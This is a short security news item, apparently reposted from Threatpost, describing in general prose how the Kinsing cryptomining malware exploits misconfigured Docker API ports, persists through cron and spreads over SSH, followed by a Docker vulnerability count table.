Self-Propagating Malware Targets Thousands of Docker Ports Per Day

2020-04-03 19:31

The Docker cloud containerization technology is under fire, with an organized, self-propagating cryptomining campaign targeting misconfigured open Docker Daemon API ports.

The attack pattern starts with the attackers identifying a misconfigured Docker API port that has been left open to the public internet.

According to the analysis, the shell script does several things: It disables security measures and clears logs; kills any other malware or cryptominers and deletes any files related to them; kills any running rival malicious Docker containers and deletes their images; downloads the Kinsing malware and runs it; and uses the "Crontab" function to download and run the same original script once every minute - presumably to maintain persistence.

"Using the information gathered, the malware then attempts to connect to each host, using every possible user and key combination through SSH, in order to download the aforementioned [d.sh] shell script and run the malware on other hosts or containers in the network."

DevSecOps teams can take steps to protect against the Kinsing threat and others, starting with making sure their Docker containers are locked down.

News URL

https://threatpost.com/self-propagating-malware-docker-ports/154453/

#docker #malware

Related vendor

VENDOR	LAST 12M	#/PRODUCTS	LOW	MEDIUM	HIGH	CRITICAL	TOTAL VULNS
Docker		24	3	27	29	18	77